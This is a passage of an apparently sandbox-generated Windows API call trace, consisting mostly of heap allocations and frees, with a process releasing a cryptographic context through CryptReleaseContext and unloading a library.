cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0264.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0264.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0264.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0264.748] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0264.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0264.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0264.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0264.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0264.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0264.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0264.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0264.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0264.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0264.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0264.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516b8 [0264.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516e8 [0264.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0264.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0264.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0264.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0264.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0264.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0264.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0264.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0264.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0264.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0264.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0264.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0264.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0264.750] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0264.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0264.767] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0264.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0264.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0264.767] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0264.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0264.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0264.768] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0264.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0264.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0264.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0264.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0264.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0264.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0264.768] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0264.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0264.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0264.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0264.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0264.768] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0264.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0264.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0264.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0264.768] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0264.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0264.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0264.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0264.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0264.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0264.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0264.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0264.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0264.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0264.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0264.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0264.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0264.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0264.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0264.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0264.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0264.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0264.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0264.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0264.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0264.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0264.769] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0264.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0264.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0264.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0264.770] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0264.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0264.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0264.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0264.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0264.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0264.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0264.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0264.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0264.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0264.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0264.770] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0264.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0264.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0264.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0264.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0264.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0264.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0264.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0264.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0264.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0264.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0264.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0264.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0264.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0264.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0264.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0264.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0264.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0264.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0264.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0264.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0264.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0264.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0264.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e699c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0264.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0264.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0264.772] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0264.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0264.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0264.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0264.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0264.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.772] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0264.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0264.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a78 [0264.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0264.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0264.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0264.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0264.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0264.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0264.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0264.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0264.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0264.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0264.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0264.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0264.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0264.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0264.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0264.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0264.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0264.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0264.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0264.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0264.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0264.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0264.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0264.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0264.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0264.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0264.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0264.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0264.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0264.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0264.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0264.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0264.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0264.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0264.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0264.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0264.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14f50 | out: hHeap=0x970000) returned 1 [0264.774] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0264.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0264.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0264.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0264.774] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bb0 [0264.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0264.774] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0264.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0264.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0264.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0264.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0264.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0264.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.775] FreeLibrary (hLibModule=0x756e0000) returned 1 [0264.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0264.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0264.775] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0264.775] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, 